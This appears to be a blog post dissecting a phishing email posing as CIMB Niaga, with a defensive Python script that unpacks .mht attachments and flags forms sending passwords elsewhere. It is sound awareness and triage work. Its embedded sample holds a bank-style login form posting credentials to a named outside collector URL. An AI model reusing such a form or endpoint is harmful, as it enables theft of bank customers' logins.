A few days ago, I got an email from a local bank asking me to update a CIMB Niaga internet banking account profile.
The email sender looks convincing, but wait, I don’t have an account at this bank! Why the hell did they send this to me?
So this triggered my curiosity, and I came up with a simple analysis, so here goes….
Notice the red highlights: the sender is a real corporate account (check the website domain here).
People will always trust a corporate account, right?
Here’s the interesting part: the email told me that I have to update my internet banking account (which I don’t have) in order to synchronize with their new, updated, secure system (so they said), and told me to download a file in order to fill out the new account information.
And if I don’t do it within the next 24 hours, my account will be frozen for security reasons!
“What the fuck? What kind of method is this?”
Getting more curious, I downloaded the file “CIMB Clicks.mht”.
Most people open a file straight after it finishes downloading, without knowing what the file might do to their computer; it could be a virus or anything else. That is foolish.
First you need to know what the extension means. The .mht extension is MHTML (MIME HTML), an archive format for web pages; it is not a programming language but a container for HTML, which is itself a markup language used to build websites (search for MHTML, RFC 2557, for a detailed explanation).
The difference between HTML and MHTML is that MHTML can combine resources inside one .mht file: the HTML document, images, stylesheets, scripts and so on are stored as MIME parts of a single file, each with its own Content-Location and Content-Type, while a plain HTML file only references those resources and loads them separately.
The difference is in the URL (Uniform Resource Locator); look at the red highlights….
This attack method is known as phishing: an attempt to acquire sensitive information such as usernames or passwords by mimicking a certain website (internet banking, Facebook, etc.), usually its login form, so that the victim types their credentials into a page the attacker controls.
Most people never check this…
Look at the highlighted part of the image: the login form’s action points to “http://www.zaiedcool.com/images/logininfo.php”, so when we submit the login information, the username and password are sent to that address instead of to the bank.
But thankfully, the file “logininfo.php” no longer exists; that script is probably where my login information (username & password) would have been stored in the hacker’s database.
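The two checks above (unpacking the .mht container into its MIME parts, then finding which form action the login data is posted to) can be done offline without ever opening the attachment in a browser. The following script is an added example written for this post, not the author’s own analysis: it uses Python’s standard `email` and `html.parser` modules, and the two .mht samples embedded in it are constructed for the example. The phishing sample reuses the collector URL quoted above; `bank.example` is a placeholder standing in for the bank’s real domain, which the post does not name.

```python
"""Triage an MHTML (.mht) attachment offline: list every embedded MIME part
and flag any HTML <form> that carries a password field but posts it to a
host other than the site the page claims to be."""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: what a phishing .mht like the one described looks like.
# The collector URL is the one quoted in the post; bank.example is a placeholder.
PHISHING_MHT = """Subject: CIMB Clicks
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----=_NextPart_000"

------=_NextPart_000
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit
Content-Location: https://bank.example/

<html><body>
<form method="post" action="http://www.zaiedcool.com/images/logininfo.php">
<input name="userid"><input name="password" type="password">
</form>
</body></html>

------=_NextPart_000
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-Location: https://bank.example/logo.gif

R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7

------=_NextPart_000--
"""

# Constructed sample of a saved page whose form posts back to the same site
# (relative action), so it must NOT be flagged.
LEGIT_MHT = """Subject: login
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----=_B"

------=_B
Content-Type: text/html; charset="utf-8"
Content-Location: https://bank.example/login

<form method="post" action="/login"><input type="password" name="pw"></form>

------=_B--
"""


class FormCollector(HTMLParser):
    """Collect {"action": str, "password": bool} for each <form> in one HTML part."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse_mht(raw):
    """Return [(content_type, content_location, payload)] for every leaf part.
    Text parts come back decoded as str, binary parts (images) as bytes."""
    msg = email.message_from_string(raw, policy=policy.default)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        location = str(part.get("Content-Location", ""))
        parts.append((part.get_content_type(), location, part.get_content()))
    return parts


def find_credential_sinks(raw, claimed_host):
    """Return the action URLs of forms that ask for a password but would send
    it to a host other than claimed_host. A relative action is resolved
    against the part's own Content-Location, as a browser would."""
    sinks = []
    for ctype, location, payload in parse_mht(raw):
        if ctype != "text/html":
            continue
        collector = FormCollector()
        collector.feed(payload)
        for form in collector.forms:
            host = urlparse(form["action"]).hostname or urlparse(location).hostname
            if form["password"] and host != claimed_host:
                sinks.append(form["action"])
    return sinks


if __name__ == "__main__":
    for ctype, location, _ in parse_mht(PHISHING_MHT):
        print(f"part: {ctype:10} {location}")
    print("credential sinks:", find_credential_sinks(PHISHING_MHT, "bank.example"))
```

Run it on a real attachment by reading the file into a string and passing it together with the domain the email claims to be from; any URL printed under “credential sinks” is where typed passwords would go. Only the parsed text is inspected, so nothing in the attachment is rendered or executed.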
So who or what is responsible for this?
It can be the person who holds the email account: maybe his/her PC got infected with a keylogging virus, a program that records every keystroke (including the email password) and sends it back to the attacker, who then uses the real account to send the phishing mail.
Where can you get infected with this kind of virus? Porn sites, betting sites, untrusted gaming sites, untrusted Facebook applications, etc.
We can also blame the system: crackers and hackers can break into a vulnerable mail server or web application, take control of it, and send out bulk email from the company’s own domain without the system administrator knowing what is going on. Either way the sender address is genuine, which is exactly why checking the form’s destination matters more than checking who the email appears to be from.
That is all, folks. I hope this post will be useful to those who read it 🙂